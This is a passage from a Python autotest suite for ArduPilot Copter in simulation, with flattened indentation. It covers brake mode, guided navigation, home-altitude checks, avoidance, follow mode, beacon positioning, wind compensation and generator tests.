tend = self.get_sim_time()
self.do_RTL()
# prevent update parameters from messing with the settings when we pop the context
self.set_parameter("FFT_ENABLE", 0)
self.reboot_sitl()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
# must reboot after we move away from EKF type 10 to EKF2 or EKF3
self.reboot_sitl()
if ex is not None:
raise ex
def fly_brake_mode(self):
# test brake mode
self.progress("Testing brake mode")
self.takeoff(10, mode="LOITER")
self.progress("Ensuring RC inputs have no effect in brake mode")
self.change_mode("STABILIZE")
self.set_rc(3, 1500)
self.set_rc(2, 1200)
self.wait_groundspeed(5, 1000)
self.change_mode("BRAKE")
self.wait_groundspeed(0, 1)
self.set_rc(2, 1500)
self.do_RTL()
self.progress("Ran brake mode")
def fly_guided_move_to(self, destination, timeout=30):
'''move to mavutil.location location; absolute altitude'''
tstart = self.get_sim_time()
self.mav.mav.set_position_target_global_int_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_GLOBAL_INT,
0b1111111111111000, # mask specifying use-only-lat-lon-alt
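            # (type_mask: a set bit means "ignore this field"; with only the
            # three position bits clear, just lat/lon/alt below are honoured)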
int(destination.lat * 1e7), # lat
int(destination.lng * 1e7), # lon
destination.alt, # alt
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
while True:
if self.get_sim_time() - tstart > timeout:
                raise NotAchievedException("Did not reach destination within %ss" % timeout)
delta = self.get_distance(self.mav.location(), destination)
self.progress("delta=%f (want <1)" % delta)
if delta < 1:
break
def test_altitude_types(self):
        '''Start by disabling GCS failsafe, otherwise we immediately disarm
        due to (apparently) not receiving traffic from the GCS for too
        long; this is probably a function of --speedup.

        This test flies the vehicle somewhere lower than where it started.
        It then disarms.  It then arms, which should reset home to the
        new, lower altitude.  This delta should be outside 1m but
        within a few metres of the old one.
        '''
# we must start mavproxy here as otherwise we can't get the
# terrain database tiles - this leads to random failures in
# CI!
mavproxy = self.start_mavproxy()
self.set_parameter("FS_GCS_ENABLE", 0)
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
max_initial_home_alt_m = 500
        if m.relative_alt > max_initial_home_alt_m * 1000:  # relative_alt is in mm
            raise NotAchievedException("Initial home alt too high (%fm > %fm)" %
                                       (m.relative_alt/1000., max_initial_home_alt_m))
orig_home_offset_mm = m.alt - m.relative_alt
self.user_takeoff(5)
self.progress("Flying to low position")
current_alt = self.mav.location().alt
        # commented-out alternative location roughly 10m away:
        # low_position = mavutil.location(-35.358273, 149.169165, current_alt, 0)
low_position = mavutil.location(-35.36200016, 149.16415599, current_alt, 0)
self.fly_guided_move_to(low_position, timeout=240)
self.change_mode('LAND')
# expecting home to change when disarmed
self.wait_landed_and_disarmed()
# wait a while for home to move (it shouldn't):
self.delay_sim_time(10)
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
new_home_offset_mm = m.alt - m.relative_alt
home_offset_delta_mm = orig_home_offset_mm - new_home_offset_mm
self.progress("new home offset: %f delta=%f" %
(new_home_offset_mm, home_offset_delta_mm))
self.progress("gpi=%s" % str(m))
max_home_offset_delta_mm = 10
if home_offset_delta_mm > max_home_offset_delta_mm:
raise NotAchievedException("Large home offset delta: want<%f got=%f" %
(max_home_offset_delta_mm, home_offset_delta_mm))
self.progress("Ensuring home moves when we arm")
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
post_arming_home_offset_mm = m.alt - m.relative_alt
self.progress("post-arming home offset: %f" % (post_arming_home_offset_mm))
self.progress("gpi=%s" % str(m))
        # acceptable home-alt delta on arming is between -4m and -3m; note
        # that "min" here is the upper bound of the (negative) range:
        min_post_arming_home_offset_delta_mm = -3000
        max_post_arming_home_offset_delta_mm = -4000
delta_between_original_home_alt_offset_and_new_home_alt_offset_mm = post_arming_home_offset_mm - orig_home_offset_mm
self.progress("delta=%f-%f=%f" % (
post_arming_home_offset_mm,
orig_home_offset_mm,
delta_between_original_home_alt_offset_and_new_home_alt_offset_mm))
self.progress("Home moved %fm vertically" % (delta_between_original_home_alt_offset_and_new_home_alt_offset_mm/1000.0))
if delta_between_original_home_alt_offset_and_new_home_alt_offset_mm > min_post_arming_home_offset_delta_mm:
raise NotAchievedException(
"Home did not move vertically on arming: want<=%f got=%f" %
(min_post_arming_home_offset_delta_mm, delta_between_original_home_alt_offset_and_new_home_alt_offset_mm))
if delta_between_original_home_alt_offset_and_new_home_alt_offset_mm < max_post_arming_home_offset_delta_mm:
raise NotAchievedException(
"Home moved too far vertically on arming: want>=%f got=%f" %
(max_post_arming_home_offset_delta_mm, delta_between_original_home_alt_offset_and_new_home_alt_offset_mm))
self.wait_disarmed()
self.stop_mavproxy(mavproxy)
def fly_precision_companion(self):
"""Use Companion PrecLand backend precision messages to loiter."""
self.context_push()
ex = None
try:
self.set_parameter("PLND_ENABLED", 1)
# enable companion backend:
self.set_parameter("PLND_TYPE", 1)
self.set_analog_rangefinder_parameters()
# set up a channel switch to enable precision loiter:
self.set_parameter("RC7_OPTION", 39)
self.reboot_sitl()
self.progress("Waiting for location")
self.mav.location()
self.zero_throttle()
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
# we should be doing precision loiter at this point
start = self.mav.recv_match(type='LOCAL_POSITION_NED',
blocking=True)
self.arm_vehicle()
self.set_rc(3, 1800)
alt_min = 10
self.wait_altitude(alt_min,
(alt_min + 5),
relative=True)
self.set_rc(3, 1500)
# move away a little
self.set_rc(2, 1550)
self.wait_distance(5, accuracy=1)
self.set_rc(2, 1500)
self.change_mode('LOITER')
# turn precision loiter on:
self.set_rc(7, 2000)
# try to drag aircraft to a position 5 metres north-east-east:
self.loiter_to_ne(start.x + 5, start.y + 10, start.z + 10)
self.loiter_to_ne(start.x + 5, start.y - 10, start.z + 10)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.zero_throttle()
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.progress("All done")
if ex is not None:
raise ex
def loiter_requires_position(self):
# ensure we can't switch to LOITER without position
self.progress("Ensure we can't enter LOITER without position")
self.context_push()
self.set_parameter("GPS_TYPE", 2)
self.set_parameter("SIM_GPS_DISABLE", 1)
self.reboot_sitl()
# check for expected EKF flags
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
expected_ekf_flags = (mavutil.mavlink.ESTIMATOR_ATTITUDE |
mavutil.mavlink.ESTIMATOR_VELOCITY_VERT |
mavutil.mavlink.ESTIMATOR_POS_VERT_ABS |
mavutil.mavlink.ESTIMATOR_CONST_POS_MODE)
if ahrs_ekf_type == 2:
expected_ekf_flags = expected_ekf_flags | mavutil.mavlink.ESTIMATOR_PRED_POS_HORIZ_REL
self.wait_ekf_flags(expected_ekf_flags, 0, timeout=120)
# arm in Stabilize and attempt to switch to Loiter
self.change_mode('STABILIZE')
self.arm_vehicle()
self.context_collect('STATUSTEXT')
self.run_cmd_do_set_mode(
"LOITER",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.wait_statustext("requires position", check_context=True)
self.disarm_vehicle()
self.context_pop()
self.reboot_sitl()
def test_arm_feature(self):
self.loiter_requires_position()
super(AutoTestCopter, self).test_arm_feature()
def test_parameter_checks(self):
self.test_parameter_checks_poscontrol("PSC")
def fly_poshold_takeoff(self):
"""ensure vehicle stays put until it is ready to fly"""
self.context_push()
ex = None
try:
self.set_parameter("PILOT_TKOFF_ALT", 700)
self.change_mode('POSHOLD')
self.set_rc(3, 1000)
self.wait_ready_to_arm()
self.arm_vehicle()
self.delay_sim_time(2)
# check we are still on the ground...
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
if abs(m.relative_alt) > 100:
raise NotAchievedException("Took off prematurely")
self.progress("Pushing throttle up")
self.set_rc(3, 1710)
self.delay_sim_time(0.5)
self.progress("Bringing back to hover throttle")
self.set_rc(3, 1500)
# make sure we haven't already reached alt:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
max_initial_alt = 500
if abs(m.relative_alt) > max_initial_alt:
raise NotAchievedException("Took off too fast (%f > %f" %
(abs(m.relative_alt), max_initial_alt))
self.progress("Monitoring takeoff-to-alt")
self.wait_altitude(6.9, 8, relative=True)
self.progress("Making sure we stop at our takeoff altitude")
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 5:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
delta = abs(7000 - m.relative_alt)
self.progress("alt=%f delta=%f" % (m.relative_alt/1000,
delta/1000))
if delta > 1000:
raise NotAchievedException("Failed to maintain takeoff alt")
self.progress("takeoff OK")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.land_and_disarm()
self.set_rc(8, 1000)
self.context_pop()
if ex is not None:
raise ex
def initial_mode(self):
return "STABILIZE"
def initial_mode_switch_mode(self):
return "STABILIZE"
def default_mode(self):
return "STABILIZE"
def rc_defaults(self):
ret = super(AutoTestCopter, self).rc_defaults()
ret[3] = 1000
ret[5] = 1800 # mode switch
return ret
def test_manual_control(self):
'''test manual_control mavlink message'''
self.set_parameter("SYSID_MYGCS", self.mav.source_system)
self.change_mode('STABILIZE')
self.takeoff(10)
tstart = self.get_sim_time_cached()
want_pitch_degrees = -12
while True:
if self.get_sim_time_cached() - tstart > 10:
raise AutoTestTimeoutException("Did not reach pitch")
self.progress("Sending pitch-forward")
self.mav.mav.manual_control_send(
1, # target system
500, # x (pitch)
32767, # y (roll)
32767, # z (thrust)
32767, # r (yaw)
0) # button mask
m = self.mav.recv_match(type='ATTITUDE', blocking=True, timeout=1)
print("m=%s" % str(m))
if m is None:
continue
p = math.degrees(m.pitch)
self.progress("pitch=%f want<=%f" % (p, want_pitch_degrees))
if p <= want_pitch_degrees:
break
self.mav.mav.manual_control_send(
1, # target system
32767, # x (pitch)
32767, # y (roll)
32767, # z (thrust)
32767, # r (yaw)
0) # button mask
self.do_RTL()
def check_avoidance_corners(self):
self.takeoff(10, mode="LOITER")
self.set_rc(2, 1400)
west_loc = mavutil.location(-35.363007,
149.164911,
0,
0)
self.wait_location(west_loc, accuracy=6)
north_loc = mavutil.location(-35.362908,
149.165051,
0,
0)
self.reach_heading_manual(0)
self.wait_location(north_loc, accuracy=6, timeout=200)
self.reach_heading_manual(90)
east_loc = mavutil.location(-35.363013,
149.165194,
0,
0)
self.wait_location(east_loc, accuracy=6)
self.reach_heading_manual(225)
self.wait_location(west_loc, accuracy=6, timeout=200)
self.set_rc(2, 1500)
self.do_RTL()
def OBSTACLE_DISTANCE_3D_test_angle(self, angle):
now = self.get_sim_time_cached()
distance = 15
right = distance * math.sin(math.radians(angle))
front = distance * math.cos(math.radians(angle))
down = 0
expected_distance_cm = distance * 100
# expected orientation
expected_orientation = int((angle+22.5)/45) % 8
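        # e.g. angle=100: int((100+22.5)/45) = 2 -> MAV_SENSOR_ROTATION_YAW_90 sector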
self.progress("Angle %f expected orient %u" %
(angle, expected_orientation))
tstart = self.get_sim_time()
last_send = 0
while True:
now = self.get_sim_time_cached()
if now - tstart > 10:
raise NotAchievedException("Did not get correct angle back")
if now - last_send > 0.1:
self.progress("ang=%f sending front=%f right=%f" %
(angle, front, right))
self.mav.mav.obstacle_distance_3d_send(
int(now*1000), # time_boot_ms
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER,
mavutil.mavlink.MAV_FRAME_BODY_FRD,
65535,
front, # x (m)
right, # y (m)
down, # z (m)
0, # min_distance (m)
20 # max_distance (m)
)
last_send = now
m = self.mav.recv_match(type="DISTANCE_SENSOR",
blocking=True,
timeout=1)
if m is None:
continue
# self.progress("Got (%s)" % str(m))
if m.orientation != expected_orientation:
# self.progress("Wrong orientation (want=%u got=%u)" %
# (expected_orientation, m.orientation))
continue
if abs(m.current_distance - expected_distance_cm) > 1:
# self.progress("Wrong distance (want=%f got=%f)" %
# (expected_distance_cm, m.current_distance))
continue
self.progress("distance-at-angle good")
break
def OBSTACLE_DISTANCE_3D(self):
self.context_push()
ex = None
try:
self.set_parameters({
"SERIAL5_PROTOCOL": 1,
"PRX_TYPE": 2,
})
self.reboot_sitl()
for angle in range(0, 360):
self.OBSTACLE_DISTANCE_3D_test_angle(angle)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_proximity_avoidance_test_corners(self):
self.start_subtest("Corners")
self.context_push()
ex = None
try:
self.load_fence("copter-avoidance-fence.txt")
self.set_parameter("FENCE_ENABLE", 1)
self.set_parameter("PRX_TYPE", 10)
self.set_parameter("RC10_OPTION", 40) # proximity-enable
self.reboot_sitl()
self.progress("Enabling proximity")
self.set_rc(10, 2000)
self.check_avoidance_corners()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.clear_fence()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_proximity_avoidance_test_alt_no_avoid(self):
self.start_subtest("Alt-no-avoid")
self.context_push()
ex = None
try:
self.set_parameter("PRX_TYPE", 2)
self.set_parameter("AVOID_ALT_MIN", 10)
self.set_analog_rangefinder_parameters()
self.reboot_sitl()
tstart = self.get_sim_time()
self.change_mode('LOITER')
while True:
if self.armed():
break
if self.get_sim_time_cached() - tstart > 60:
raise AutoTestTimeoutException("Did not arm")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
500, # max_distance cm
400, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
26, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE, # orientation
255 # covariance
)
self.send_cmd(mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
1, # ARM
0,
0,
0,
0,
0,
0)
self.wait_heartbeat()
self.takeoff(15, mode='LOITER')
self.progress("Poking vehicle; should avoid")
def shove(a, b):
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
500, # max_distance cm
20, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE, # orientation
255 # covariance
)
self.wait_speed_vector_bf(
Vector3(-0.4, 0.0, 0.0),
timeout=10,
called_function=shove,
)
self.change_alt(5)
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 10:
break
vel = self.get_body_frame_velocity()
if vel.length() > 0.3:
raise NotAchievedException("Moved too much (%s)" %
(str(vel),))
shove(None, None)
except Exception as e:
self.progress("Caught exception: %s" %
self.get_exception_stacktrace(e))
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_proximity_avoidance_test(self):
self.fly_proximity_avoidance_test_alt_no_avoid()
self.fly_proximity_avoidance_test_corners()
def fly_fence_avoidance_test(self):
self.context_push()
ex = None
try:
self.load_fence("copter-avoidance-fence.txt")
self.set_parameter("FENCE_ENABLE", 1)
self.check_avoidance_corners()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.clear_fence()
self.disarm_vehicle(force=True)
if ex is not None:
raise ex
def global_position_int_for_location(self, loc, time_boot, heading=0):
return self.mav.mav.global_position_int_encode(
int(time_boot * 1000), # time_boot_ms
int(loc.lat * 1e7),
int(loc.lng * 1e7),
int(loc.alt * 1000), # alt in mm
            20,  # relative_alt (mm); nominal non-zero value
vx=0,
vy=0,
vz=0,
hdg=heading
)
def fly_follow_mode(self):
self.set_parameter("FOLL_ENABLE", 1)
self.set_parameter("FOLL_SYSID", self.mav.source_system)
foll_ofs_x = 30 # metres
self.set_parameter("FOLL_OFS_X", -foll_ofs_x)
self.set_parameter("FOLL_OFS_TYPE", 1) # relative to other vehicle heading
self.takeoff(10, mode="LOITER")
self.set_parameter("SIM_SPEEDUP", 1)
self.change_mode("FOLLOW")
new_loc = self.mav.location()
new_loc_offset_n = 20
new_loc_offset_e = 30
self.location_offset_ne(new_loc, new_loc_offset_n, new_loc_offset_e)
self.progress("new_loc: %s" % str(new_loc))
heading = 0
if self.mavproxy is not None:
self.mavproxy.send("map icon %f %f greenplane %f\n" %
(new_loc.lat, new_loc.lng, heading))
expected_loc = copy.copy(new_loc)
self.location_offset_ne(expected_loc, -foll_ofs_x, 0)
if self.mavproxy is not None:
self.mavproxy.send("map icon %f %f hoop\n" %
(expected_loc.lat, expected_loc.lng))
self.progress("expected_loc: %s" % str(expected_loc))
last_sent = 0
tstart = self.get_sim_time()
while True:
now = self.get_sim_time_cached()
if now - tstart > 60:
raise NotAchievedException("Did not FOLLOW")
if now - last_sent > 0.5:
gpi = self.global_position_int_for_location(new_loc,
now,
heading=heading)
gpi.pack(self.mav.mav)
self.mav.mav.send(gpi)
self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
pos = self.mav.location()
delta = self.get_distance(expected_loc, pos)
max_delta = 3
self.progress("position delta=%f (want <%f)" % (delta, max_delta))
if delta < max_delta:
break
self.do_RTL()
def get_global_position_int(self, timeout=30):
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not get good global_position_int")
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
self.progress("GPI: %s" % str(m))
if m is None:
continue
if m.lat != 0 or m.lon != 0:
return m
def fly_beacon_position(self):
self.reboot_sitl()
self.wait_ready_to_arm(require_absolute=True)
old_pos = self.get_global_position_int()
print("old_pos=%s" % str(old_pos))
self.context_push()
ex = None
try:
self.set_parameter("BCN_TYPE", 10)
self.set_parameter("BCN_LATITUDE", SITL_START_LOCATION.lat)
self.set_parameter("BCN_LONGITUDE", SITL_START_LOCATION.lng)
self.set_parameter("BCN_ALT", SITL_START_LOCATION.alt)
self.set_parameter("BCN_ORIENT_YAW", 0)
self.set_parameter("AVOID_ENABLE", 4)
self.set_parameter("GPS_TYPE", 0)
self.set_parameter("EK3_ENABLE", 1)
self.set_parameter("EK3_SRC1_POSXY", 4) # Beacon
self.set_parameter("EK3_SRC1_POSZ", 1) # Baro
self.set_parameter("EK3_SRC1_VELXY", 0) # None
self.set_parameter("EK3_SRC1_VELZ", 0) # None
self.set_parameter("EK2_ENABLE", 0)
self.set_parameter("AHRS_EKF_TYPE", 3)
self.reboot_sitl()
            # turn off GPS arming checks; it's arguably a bug that we
            # need to do this at all.
old_arming_check = int(self.get_parameter("ARMING_CHECK"))
            if old_arming_check == 1:
                # ARMING_CHECK==1 means "all checks"; expand it to an explicit
                # bitmask before clearing the GPS bit below (the original
                # `1 ^ 25 - 1` evaluates to 25 due to operator precedence,
                # assumed to be a typo for an all-bits mask):
                old_arming_check = (1 << 25) - 1
new_arming_check = int(old_arming_check) & ~(1 << 3)
self.set_parameter("ARMING_CHECK", new_arming_check)
self.reboot_sitl()
            # require_absolute=True implies a GPS is present
self.wait_ready_to_arm(require_absolute=False)
tstart = self.get_sim_time()
timeout = 20
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not get new position like old position")
self.progress("Fetching location")
new_pos = self.get_global_position_int()
pos_delta = self.get_distance_int(old_pos, new_pos)
max_delta = 1
self.progress("delta=%u want <= %u" % (pos_delta, max_delta))
if pos_delta <= max_delta:
break
self.progress("Moving to ensure location is tracked")
self.takeoff(10, mode="STABILIZE")
self.change_mode("CIRCLE")
tstart = self.get_sim_time()
max_delta = 0
max_allowed_delta = 10
while True:
if self.get_sim_time_cached() - tstart > timeout:
break
pos_delta = self.get_distance_int(self.sim_location_int(), self.get_global_position_int())
self.progress("pos_delta=%f max_delta=%f max_allowed_delta=%f" % (pos_delta, max_delta, max_allowed_delta))
if pos_delta > max_delta:
max_delta = pos_delta
if pos_delta > max_allowed_delta:
raise NotAchievedException("Vehicle location not tracking simulated location (%f > %f)" %
(pos_delta, max_allowed_delta))
self.progress("Tracked location just fine (max_delta=%f)" % max_delta)
self.change_mode("LOITER")
self.wait_groundspeed(0, 0.3, timeout=120)
self.land_and_disarm()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_beacon_avoidance_test(self):
self.context_push()
ex = None
try:
self.set_parameter("BCN_TYPE", 10)
self.set_parameter("BCN_LATITUDE", int(SITL_START_LOCATION.lat))
self.set_parameter("BCN_LONGITUDE", int(SITL_START_LOCATION.lng))
self.set_parameter("BCN_ORIENT_YAW", 45)
self.set_parameter("AVOID_ENABLE", 4)
self.reboot_sitl()
self.takeoff(10, mode="LOITER")
self.set_rc(2, 1400)
west_loc = mavutil.location(-35.362919, 149.165055, 0, 0)
self.wait_location(west_loc, accuracy=7)
self.reach_heading_manual(0)
north_loc = mavutil.location(-35.362881, 149.165103, 0, 0)
self.wait_location(north_loc, accuracy=7)
self.set_rc(2, 1500)
self.set_rc(1, 1600)
east_loc = mavutil.location(-35.362986, 149.165227, 0, 0)
self.wait_location(east_loc, accuracy=7)
self.set_rc(1, 1500)
self.set_rc(2, 1600)
south_loc = mavutil.location(-35.363025, 149.165182, 0, 0)
self.wait_location(south_loc, accuracy=7)
self.set_rc(2, 1500)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.clear_fence()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_wind_baro_compensation(self):
self.context_push()
ex = None
try:
self.customise_SITL_commandline(
["--defaults", ','.join(self.model_defaults_filepath('ArduCopter', 'Callisto'))],
model="octa-quad:@ROMFS/models/Callisto.json",
wipe=True,
)
wind_spd_truth = 8.0
wind_dir_truth = 90.0
self.set_parameter("EK3_ENABLE", 1)
self.set_parameter("EK2_ENABLE", 0)
self.set_parameter("AHRS_EKF_TYPE", 3)
self.set_parameter("BARO1_WCF_ENABLE", 1.000000)
self.reboot_sitl()
self.set_parameter("EK3_DRAG_BCOEF_X", 361.000000)
self.set_parameter("EK3_DRAG_BCOEF_Y", 361.000000)
self.set_parameter("EK3_DRAG_MCOEF", 0.082000)
self.set_parameter("BARO1_WCF_FWD", -0.300000)
self.set_parameter("BARO1_WCF_BCK", -0.300000)
self.set_parameter("BARO1_WCF_RGT", 0.300000)
self.set_parameter("BARO1_WCF_LFT", 0.300000)
self.set_parameter("SIM_BARO_WCF_FWD", -0.300000)
self.set_parameter("SIM_BARO_WCF_BAK", -0.300000)
self.set_parameter("SIM_BARO_WCF_RGT", 0.300000)
self.set_parameter("SIM_BARO_WCF_LFT", 0.300000)
self.set_parameter("SIM_WIND_DIR", wind_dir_truth)
self.set_parameter("SIM_WIND_SPD", wind_spd_truth)
self.set_parameter("SIM_WIND_T", 1.000000)
self.reboot_sitl()
            # require_absolute=True implies a GPS is present
self.wait_ready_to_arm(require_absolute=False)
self.progress("Climb to 20m in LOITER and yaw spin for 30 seconds")
self.takeoff(10, mode="LOITER")
self.set_rc(4, 1400)
self.delay_sim_time(30)
            # check wind estimates
m = self.mav.recv_match(type='WIND', blocking=True)
speed_error = abs(m.speed - wind_spd_truth)
angle_error = abs(m.direction - wind_dir_truth)
if (speed_error > 1.0):
raise NotAchievedException("Wind speed incorrect - want %f +-1 got %f m/s" % (wind_spd_truth, m.speed))
if (angle_error > 15.0):
raise NotAchievedException(
"Wind direction incorrect - want %f +-15 got %f deg" %
(wind_dir_truth, m.direction))
self.progress("Wind estimate is good, now check height variation for 30 seconds")
# check height stability over another 30 seconds
z_min = 1E6
z_max = -1E6
tstart = self.get_sim_time()
while (self.get_sim_time() < tstart + 30):
m = self.mav.recv_match(type='LOCAL_POSITION_NED', blocking=True)
if (m.z > z_max):
z_max = m.z
if (m.z < z_min):
z_min = m.z
if (z_max-z_min > 0.5):
raise NotAchievedException("Height variation is excessive")
self.progress("Height variation is good")
self.set_rc(4, 1500)
self.land_and_disarm()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def wait_generator_speed_and_state(self, rpm_min, rpm_max, want_state, timeout=240):
self.drain_mav()
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not move to state/speed")
m = self.mav.recv_match(type="GENERATOR_STATUS", blocking=True, timeout=10)
if m is None:
raise NotAchievedException("Did not get GENERATOR_STATUS")
if m.generator_speed < rpm_min:
self.progress("Too slow (%u<%u)" % (m.generator_speed, rpm_min))
continue
if m.generator_speed > rpm_max:
self.progress("Too fast (%u>%u)" % (m.generator_speed, rpm_max))
continue
            if m.status != want_state:
                self.progress("Wrong state (got=%u want=%u)" % (m.status, want_state))
                continue
            break
self.progress("Got generator speed and state")
def test_richenpower(self):
self.set_parameter("SERIAL5_PROTOCOL", 30)
self.set_parameter("SIM_RICH_ENABLE", 1)
self.set_parameter("SERVO8_FUNCTION", 42)
self.set_parameter("SIM_RICH_CTRL", 8)
self.set_parameter("RC9_OPTION", 85)
self.set_parameter("LOG_DISARMED", 1)
self.set_parameter("BATT2_MONITOR", 17)
self.set_parameter("GEN_TYPE", 3)
self.reboot_sitl()
self.set_rc(9, 1000) # remember this is a switch position - stop
self.customise_SITL_commandline(["--uartF=sim:richenpower"])
self.wait_statustext("requested state is not RUN", timeout=60)
self.set_message_rate_hz("GENERATOR_STATUS", 10)
self.drain_mav_unparsed()
self.wait_generator_speed_and_state(0, 0, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_OFF)
messages = []
def my_message_hook(mav, m):
if m.get_type() != 'STATUSTEXT':
return
messages.append(m)
self.install_message_hook(my_message_hook)
try:
self.set_rc(9, 2000) # remember this is a switch position - run
finally:
self.remove_message_hook(my_message_hook)
if "Generator HIGH" not in [x.text for x in messages]:
self.wait_statustext("Generator HIGH", timeout=60)
self.set_rc(9, 1000) # remember this is a switch position - stop
self.wait_statustext("requested state is not RUN", timeout=200)
self.set_rc(9, 1500) # remember this is a switch position - idle
self.wait_generator_speed_and_state(3000, 8000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_IDLE)
self.set_rc(9, 2000) # remember this is a switch position - run
# self.wait_generator_speed_and_state(3000, 30000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_WARMING_UP)
self.wait_generator_speed_and_state(8000, 30000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_GENERATING)
bs = self.mav.recv_match(
type="BATTERY_STATUS",
condition="BATTERY_STATUS.id==1", # id is zero-indexed
timeout=1,
blocking=True
)
if bs is None:
raise NotAchievedException("Did not receive BATTERY_STATUS")
self.progress("Received battery status: %s" % str(bs))
want_bs_volt = 50000
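        # BATTERY_STATUS.voltages[] is reported in millivolts, so 50000 == 50V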
if bs.voltages[0] != want_bs_volt:
raise NotAchievedException("Battery voltage not as expected (want=%f) got=(%f)" % (want_bs_volt, bs.voltages[0],))
self.progress("Moving *back* to idle")
self.set_rc(9, 1500) # remember this is a switch position - idle
self.wait_generator_speed_and_state(3000, 10000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_IDLE)
self.progress("Moving *back* to run")
self.set_rc(9, 2000) # remember this is a switch position - run
self.wait_generator_speed_and_state(8000, 30000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_GENERATING)
self.set_message_rate_hz("GENERATOR_STATUS", -1)
self.set_parameter("LOG_DISARMED", 0)
if not self.current_onboard_log_contains_message("GEN"):
raise NotAchievedException("Did not find expected GEN message")
def test_ie24(self):
self.context_push()
ex = None
try:
self.set_parameter("SERIAL5_PROTOCOL", 30)
self.set_parameter("SERIAL5_BAUD", 115200)
self.set_parameter("GEN_TYPE", 2)
self.set_parameter("BATT2_MONITOR", 17)
self.set_parameter("SIM_IE24_ENABLE", 1)
self.set_parameter("LOG_DISARMED", 1)
self.customise_SITL_commandline(["--uartF=sim:ie24"])
self.wait_ready_to_arm()
self.arm_vehicle()
self.disarm_vehicle()
# Test for pre-arm check fail when state is not running
self.start_subtest("If you haven't taken off generator error should cause instant failsafe and disarm")
self.set_parameter("SIM_IE24_STATE", 8)
self.wait_statustext("Status not running", timeout=40)
self.try_arm(result=False,
expect_msg="Status not running")
self.set_parameter("SIM_IE24_STATE", 2) # Explicitly set state to running
# Test that error code does result in failsafe
self.start_subtest("If you haven't taken off generator error should cause instant failsafe and disarm")
self.change_mode("STABILIZE")
self.set_parameter("DISARM_DELAY", 0)
self.arm_vehicle()
self.set_parameter("SIM_IE24_ERROR", 30)
self.disarm_wait(timeout=1)
self.set_parameter("SIM_IE24_ERROR", 0)
self.set_parameter("DISARM_DELAY", 10)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def test_aux_switch_options(self):
self.set_parameter("RC7_OPTION", 58) # clear waypoints
self.load_mission("copter_loiter_to_alt.txt")
self.set_rc(7, 1000)
self.assert_mission_count(5)
self.progress("Clear mission")
self.set_rc(7, 2000)
self.delay_sim_time(1) # allow switch to debounce
self.assert_mission_count(0)
self.set_rc(7, 1000)
self.set_parameter("RC7_OPTION", 24) # reset mission
self.delay_sim_time(2)
self.load_mission("copter_loiter_to_alt.txt")
set_wp = 4
self.set_current_waypoint(set_wp)
self.wait_current_waypoint(set_wp, timeout=10)
self.progress("Reset mission")
self.set_rc(7, 2000)
self.delay_sim_time(1)
self.drain_mav()
self.wait_current_waypoint(0, timeout=10)
self.set_rc(7, 1000)
def test_aux_functions_in_mission(self):
self.load_mission("aux_functions.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
